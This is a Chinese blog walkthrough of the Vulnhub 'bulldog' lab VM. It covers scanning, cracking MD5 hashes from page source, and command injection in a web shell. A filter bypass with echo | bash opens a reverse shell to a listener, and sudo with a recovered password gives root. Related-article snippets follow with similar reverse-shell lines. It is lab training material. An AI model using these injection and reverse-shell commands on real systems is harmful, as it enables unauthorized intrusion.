Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

最新推荐文章于 2025-04-01 11:00:00 发布
最新推荐文章于 2025-04-01 11:00:00 发布
阅读量2.7k 收藏 3
点赞数 1
分类专栏: Vulnhub-CTF 渗透测试 文章标签: web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45722813/article/details/121337312
版权

Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/
下载将其导入VMware,设置网络模式为NAT模式,开启靶机虚拟机
在kali攻击机使用命令nmap -Pn 192.168.172.1/24来获取靶机的IP地址
在这里插入图片描述
这里如果实在扫不出来靶机IP地址的话参考这篇文章来进行设置
https://blog.youkuaiyun.com/qq_45722813/article/details/121324686

得到靶机IP地址后再使用命令nmap -A -p- 192.168.172.137扫描靶机的操作系统及版本,开放端口和服务等,这里发现靶机操作系统版本,开放端口为23对应ssh服务,80和8080端口都对应http服务
在这里插入图片描述
然后打开浏览器在地址栏输入靶机IP地址回车打开网页
在这里插入图片描述
点开“Public Notice”查看,这里我用划词翻译翻译了一下,但是好像没什么用
在这里插入图片描述
然后我们在kali命令行中输入dirb http://192.168.172.137扫描后台目录发现了/admi/dev/dev/shell/
在这里插入图片描述
然后再浏览器地址栏输入http://192.168.172.137/admin,发现一个登录页面
在这里插入图片描述
查看源码,没有什么信息和提示
在这里插入图片描述
把地址栏换成http://192.168.172.137/dev/回车看看,还是一堆英文,但是最下面看到有一些好像是啥用户名或邮箱地址的东西
在这里插入图片描述
再把地址栏的地址换成http://192.168.172.137/dev/shell,提示我们要先想服务器验证才能使用shell
在这里插入图片描述
所以回到刚才的http://192.168.172.137/dev/,然后我们查看源码,发现一些奇怪的东西
在这里插入图片描述
猜测应该是MD5,然后拿去md5解码,得到了nick对应的解码为nulldog,sarah对应的解码为nulldoglover,
在这里插入图片描述
然后回到开始的登录页面,输入用户名和密码进行登录
在这里插入图片描述
登录进去发现还说什么也没有,查看源码也没什么东西
在这里插入图片描述
现在再回到http://192.168.172.137/dev/shell/,发现可以打开页面了,还有一个shell输入框并告诉了可以输入哪些命令,这里应该是远程命令执行
在这里插入图片描述
输入ifconfig | ls有ls的显示,存在命令注入
在这里插入图片描述
然后我们尝试反弹shell,首先在kali机使用命令nc -lnvp 6666进行监听
在这里插入图片描述

然后在web-shell的输入框中输入命令bash -i >& /dev/tcp/192.168.172.131/6666 0>&1执行,但是发现被挡了,他发现我进行攻击了
在这里插入图片描述
然后换种方式,输入命令echo "bash -i >& /dev/tcp/192.168.172.131/6666 0>&1" | bash,执行就可以了
在这里插入图片描述
成功反弹shell
在这里插入图片描述
查看目录,在/home目录下发现一个bulldogadmin
在这里插入图片描述
但是进到bulldogadmin目录下什么都没有
在这里插入图片描述

首先使用命令cat /etc/passwd查看所有用户
在这里插入图片描述
同时发现bulldogadmin是一个用户,所以使用命令find / -user bulldogadmin 2>/dev/null查找bulldogadmin用户的文件,发现这几个隐藏文件
在这里插入图片描述
使用命令cat /home/bulldogadmin/.hiddenadmindirectory/note查看文件内容
在这里插入图片描述
全是英文,将其复制到百度翻译中进行翻译
在这里插入图片描述
再查看另一个文件,命令cat /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp查看,但是全是乱码
在这里插入图片描述
使用命令strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp将文件内容转化为可打印字符在这里插入图片描述
然后直接使用sudo su命令进行提权,发现不行
在这里插入图片描述

出现上面的情况是因为我们是反弹回来的nc shell,这个shell的使用是有限制的,我们要使用命令python -c "import pty; pty.spawn('/bin/bash')"设置tty,将其转化为交互式shell,以便能够完全交互和使用其所有功能
在这里插入图片描述
还是不行,要在命令前面加上sudo才有权限执行
在这里插入图片描述
可以是可以了,但是需要输入用户密码,先试一下bulldog,但是发现不行
在这里插入图片描述
刚才我们将那个乱码文件转化后显示的内容中有一串super password之类的字符串,去掉其中的H组成字符串SUPERultimatePASSWORDyouCANTget,发现成了,已经提权到root用户
在这里插入图片描述
输入cd回车跳转到根目录下,ls命令查看文件及目录,发现有个congrats.txt文件,使用命令cat congrats.txt打开文件查看内容
在这里插入图片描述
它提示这里有两种方式提权到root用户权限,还有一种暂时不知道,就到这里了

参考文章:
https://www.freebuf.com/column/200047.html

[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入shell反弹、获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
(Vulnhub练习)--Bulldog1渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-18 435
Bulldog1渗透实战 文章转载 靶机渗透测试实战(三)——Bulldog1渗透实战 Bulldog1渗透实战 扫描不到bulldog主机ip ​ 【1】从新启动bulldog,到开机页面选择第二个Ubuntu的高级选项。 ​ 【2】进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 选择root一行回车,进入命令行模式。 vim /etc/network/interfaces ,修改网卡名称成步骤查询的结果,保存。 auto ens33 iface ens33 inet dhcp reb
VulnHub靶场-bulldog
hxync的博客
08-07 406
靶场下载地址:http://www.vulnhub.com/entry/bulldog-1,211/ 下载之后用VirtualBox打开即可。 搭建好靶场之后可以看到ip 用kali自带的火狐访问一下这个ip,没有发现什么有用的信息 用dirbuster扫一下 扫到的内容如下 访问admin发现后台登录页面 访问dev发现有一个web-shell链接 点击之后会示需要认证 dev页面翻译一下,可以知道网站是用的Django,并且开启了ssh Rob...
vuInhub靶场实战系列--bulldog-1
weixin_45221204的博客
06-03 1841
Vulnhub是一个供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核等内容。😃使用nmap进行主机发现端口扫描使用dirbsearch进行目录扫描MD5解密netcat监听反弹shell。
Vulnhub-AI-Web1.0靶场通关攻略
qq_65852138的博客
04-01 518
【代码】Vulnhub-AI-Web1.0靶场通关攻略。
渗透测试】靶机渗透Vulnhub-bulldog
SunnyCat
06-01 3786
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.youkuaiyun.com/Eastmount/article/detai
Bulldog靶场记录
weixin_46411728的博客
09-18 973
bulldog靶场
VulnHub渗透测试实战靶场 - Bulldog: 1
LYJ20010728的博客
08-05 556
VulnHub渗透测试实战靶场 - Bulldog: 1环境下载Bulldog: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell 环境下载 戳此进行环境下载 Bulldog: 1靶机搭建 具体步骤参考VirtualBox(Host only)VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 获取到IP地址为:192.168.56.101 渗透测试
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
VulnHub渗透测试-Bulldog2
原味瓜子、的博客
09-30 385
文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现三、漏洞利用、GetShell四、升,得到Flag五、种植后门、清理痕迹 渗透步骤 一、主机发现、端口扫描 //主机发现 root@kali:~# ifconfig root@kali:~# nmap -sn 192.168.56.1/24 //端口扫描,获取服务、系统版本信息 root@kali:~# nmap -sV -O 192.168.56.104 //目录扫描 root@kali:~# dirb http://192.168.
VulnHub靶机渗透】一:BullDog2
野原新之助
03-20 1245
在网上大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试,熟悉了整体步骤,希望之后的靶机能越来越多的自己独立完成(大佬NB!),现将详细过程做如下整理。 简介 ...
bulldog-vulnhub
weixin_43841336的博客
07-18 195
1.nmap扫描存活主机,找到靶机(192.168.34.160) 2.nmap -sV -p0-65535 -T4扫描开放端口 80端口8080端口一样, 3.用dirb扫描一下 访问/dev 下面有个web-shell进去以后需要登陆 打开源码邮件后面都有MD5加密后的字符串,解密ddf45997a7e18a25ad5f5cf222da64814dd060d5为bulldog,账号为nic...
靶机bulldog2练习:通过反弹shell进行
7Riven's blog
11-22 1059
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149 扫描网段:发现有主机IP地址为192.168.109.149,存活 扫描发现目标的目标主机信息如下: -sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...
Vulnhub靶场渗透练习() bulldog
weixin_30563917的博客
07-08 239
拿到靶场后先对ip进行扫描 获取ip 端口 针对项目路径爆破 获取两个有用文件 http://192.168.18.144/dev/ dev,admin 更具dev 发现他们用到框架语言 找到一个 shell 连接 http://192.168.18.144/dev/shell/ 反健源码 查看可以看到 丢入md5 网站解密 成功的解密2...
vulnhub bulldog
dfhjlll的博客
02-11 355
配置环境 bulldog需要在virtualbox虚拟机下运行,导入后,网卡选择仅主机模式,打开后会自动出现ip ip:192.168.56.101 点开vmware中的虚拟选项编辑器中 点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter kali在VMware下运行,设置成桥接模式 打开,查看ip :192.168.56.102 使用...
vulnhub靶场bulldog1
kukudeshuo的博客
08-12 304
vulnhub靶场bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128) 靶机:bulldog1(192.168.109.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.157 使用nmap扫描查看目标靶机端口开放
Vulnhub系列bulldog
大方子
09-27 1889
=========================== 个人收获: 1.dirb挖掘网页目录 2.Linux 可以用&同时执行多条命令 3.Kali利用Python搭建简单HTTP服务器 4.python写的shell反弹脚本 5.利用python pty模块的shell来进行交互 ============================ 下载地址:https://d...
bulldog1靶场渗透
b1n的博客
08-26 307
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥。4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名密码进行登录。5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行。
【甄选靶场Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
人间体佐菲的博客
10-22 636
【甄选靶场Vulnhub百个项目渗透——项目四十六:bulldog-2(登陆框命令执行,写入用户)
vulnhub-bulldog2靶机渗透扫描不出靶机ip
最新发布
04-03
### 关于VulnHub Bulldog2靶机无法扫描到IP的解决方案 在渗透测试过程中,如果遇到无法通过常规手段扫描到目标主机的情况,可以尝试多种技术组合来定位目标主机。以下是针对此问题的具体分析建议: #### 使用ARP扫描工具 当标准的`ping`或`nmap`扫描未能发现目标主机时,可以通过局域网内的ARP广播请求找到活动设备。例如,在引用中到的方法3使用了`netdiscover`命令[^3]: ```bash netdiscover -r 192.168.44.0/24 -i eth0 ``` 上述命令会向指定子网发送ARP请求并监听响应,从而识别出网络中的活跃主机。 #### 调整Nmap参数优化扫描效果 除了传统的ICMP Ping外,还可以利用TCP SYN包或其他协议类型的探测方式高成功率。比如下面这条指令包含了服务版本检测(-sV),隐秘模式(SYN半开扫描-sS)以及调整时间模板至更快执行速度(T4)[^2]: ```bash nmap -sS -sV -T4 192.168.11.19 ``` 另外值得注意的是,有时防火墙可能阻止来自外部源地址的数据包进入内部网络;因此有必要确认Kali Linux所在环境与Bulldog2 VM之间确实处于同一物理或者逻辑二层交换结构下(即两者能够互相访问对方MAC层面的信息). #### 测试Telnet/TCP连接验证特定端口状态 即使整体Ping不通某个节点,但如果已知其开放的服务端口号,则可以直接发起相应层次上的握手过程来进行判断是否存在可交互对象。正如材料里所描述那样,“尝试远程连接23端口后失败。”这表明虽然telnet未成功建立session,但仍不失为一种排查思路之一[^1]. 综上所述,对于找不到vulnhub bulldog2 IP这一难题,可以从多个角度出发寻找突破口:一方面借助专门设计用于本地网段探索的应用程序如NetDiscover;另一方面灵活运用高级配置选项丰富的侦查利器-NMAP,并辅以其他辅助性操作进一步缩小范围直至最终锁定确切位置。 ```python import os def scan_network(): command = 'netdiscover -r 192.168.44.0/24 -i eth0' result = os.popen(command).read() print(result) scan_network() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值